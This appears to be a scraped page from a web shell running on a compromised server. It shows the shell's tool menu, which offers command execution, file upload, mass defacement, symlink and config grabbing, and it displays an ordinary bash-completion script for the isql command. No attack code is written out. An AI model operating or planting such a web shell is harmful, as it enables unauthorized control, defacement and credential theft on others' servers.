OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /var/../usr/lib32/../share/maria/../glib-2.0/../cryptsetup/../bash-completion/completions/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
# isql completion -*- shell-script -*- # by Victor Bogado da Silva Lins <victor@bogado.net> _isql() { local cur prev words cword _init_completion || return [[ -f $ODBCINI ]] \ && COMPREPLY=( $(command grep "\[$cur" "$ODBCINI" | tr -d \[\]) ) } && complete -F _isql isql # ex: filetype=sh